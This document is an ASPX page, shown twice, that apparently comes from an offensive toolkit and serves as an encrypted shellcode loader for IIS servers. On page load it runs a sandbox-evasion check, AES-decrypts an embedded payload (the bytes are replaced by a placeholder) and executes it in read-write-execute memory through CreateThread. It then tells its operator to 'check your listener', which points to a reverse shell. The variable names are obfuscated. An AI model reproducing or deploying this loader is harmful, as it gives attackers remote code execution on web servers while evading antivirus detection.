MzHmO/ex.aspx

## ex.aspx
```cs
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

[   System.Runtime.InteropServices.DllImport("kernel32.dll")]
    private static extern IntPtr GetCurrentProcess();

    private byte[] Decrypt(byte[] data, byte[] key, byte[] iv)
    {
        using (var aes = Aes.Create())
        {
            aes.KeySize = 256;
            aes.BlockSize = 128;
            aes.Padding = PaddingMode.Zeros;

            aes.Key = key;
            aes.IV = iv;

            using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
            {
                return PerformCryptography(data, decryptor);
            }
        }
    }

    private byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
    {
        using (var ms = new MemoryStream())
        using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
        {
            cryptoStream.Write(data, 0, data.Length);
            cryptoStream.FlushFinalBlock();
            return ms.ToArray();
        }
    }

    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    protected void Page_Load(object sender, EventArgs e)
    {
        IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
        if(mem == null)
        {
            return;
        }

        byte[] Enc = new byte[688] {
        0x46, <шеллкод> ,0x02 };

        byte[] Key = new byte[32] {
        0x57, 0xef, 0x18, 0x5a, 0x8f, 0xd4, 0x32, 0xbc, 0x4f, 0x39, 0x66, 0x3f, 0x0c, 0x17, 0x0b,
        0x1e, 0x9e, 0xb4, 0x82, 0x3e, 0x4d, 0x9d, 0xa9, 0x05, 0x90, 0x23, 0xee, 0x03, 0xa7, 0x81,
        0x5f, 0xdd };

        // IV
        byte[] Iv = new byte[16] {
        0x6e, 0x8f, 0xa8, 0xdd, 0xe6, 0x8e, 0xe1, 0x10, 0x63, 0x17, 0x11, 0x02, 0xc8, 0xfb, 0x60,
        0x6b };

        byte[] e4qRS= Decrypt(Enc, Key, Iv);

        IntPtr zG5fzCKEhae = VirtualAlloc(IntPtr.Zero,(UIntPtr)e4qRS.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        System.Runtime.InteropServices.Marshal.Copy(e4qRS,0,zG5fzCKEhae,e4qRS.Length);

        IntPtr aj5QpPE = IntPtr.Zero;
        IntPtr oiAJp5aJjiZV = CreateThread(IntPtr.Zero,UIntPtr.Zero,zG5fzCKEhae,IntPtr.Zero,0,ref aj5QpPE);
    }
</script>
<!DOCTYPE html>
<html>
<body>
    <p>Check your listener...</p>
</body>
</html>
```
	```cs
	<%@ Page Language="C#" AutoEventWireup="true" %>
	<%@ Import Namespace="System.IO" %>
	<%@ Import Namespace="System.Security.Cryptography" %>
	<script runat="server">

	[System.Runtime.InteropServices.DllImport("kernel32")]
	private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

	[System.Runtime.InteropServices.DllImport("kernel32")]
	private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

	[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
	private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

	[ System.Runtime.InteropServices.DllImport("kernel32.dll")]
	private static extern IntPtr GetCurrentProcess();

	private byte[] Decrypt(byte[] data, byte[] key, byte[] iv)
	{
	using (var aes = Aes.Create())
	{
	aes.KeySize = 256;
	aes.BlockSize = 128;
	aes.Padding = PaddingMode.Zeros;

	aes.Key = key;
	aes.IV = iv;

	using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
	{
	return PerformCryptography(data, decryptor);
	}
	}
	}

	private byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
	{
	using (var ms = new MemoryStream())
	using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
	{
	cryptoStream.Write(data, 0, data.Length);
	cryptoStream.FlushFinalBlock();
	return ms.ToArray();
	}
	}

	private static Int32 MEM_COMMIT=0x1000;
	private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

	protected void Page_Load(object sender, EventArgs e)
	{
	IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
	if(mem == null)
	{
	return;
	}

	byte[] Enc = new byte[688] {
	0x46, <шеллкод> ,0x02 };

	byte[] Key = new byte[32] {
	0x57, 0xef, 0x18, 0x5a, 0x8f, 0xd4, 0x32, 0xbc, 0x4f, 0x39, 0x66, 0x3f, 0x0c, 0x17, 0x0b,
	0x1e, 0x9e, 0xb4, 0x82, 0x3e, 0x4d, 0x9d, 0xa9, 0x05, 0x90, 0x23, 0xee, 0x03, 0xa7, 0x81,
	0x5f, 0xdd };

	// IV
	byte[] Iv = new byte[16] {
	0x6e, 0x8f, 0xa8, 0xdd, 0xe6, 0x8e, 0xe1, 0x10, 0x63, 0x17, 0x11, 0x02, 0xc8, 0xfb, 0x60,
	0x6b };

	byte[] e4qRS= Decrypt(Enc, Key, Iv);

	IntPtr zG5fzCKEhae = VirtualAlloc(IntPtr.Zero,(UIntPtr)e4qRS.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	System.Runtime.InteropServices.Marshal.Copy(e4qRS,0,zG5fzCKEhae,e4qRS.Length);

	IntPtr aj5QpPE = IntPtr.Zero;
	IntPtr oiAJp5aJjiZV = CreateThread(IntPtr.Zero,UIntPtr.Zero,zG5fzCKEhae,IntPtr.Zero,0,ref aj5QpPE);
	}
	</script>
	<!DOCTYPE html>
	<html>
	<body>
	<p>Check your listener...</p>
	</body>
	</html>
	```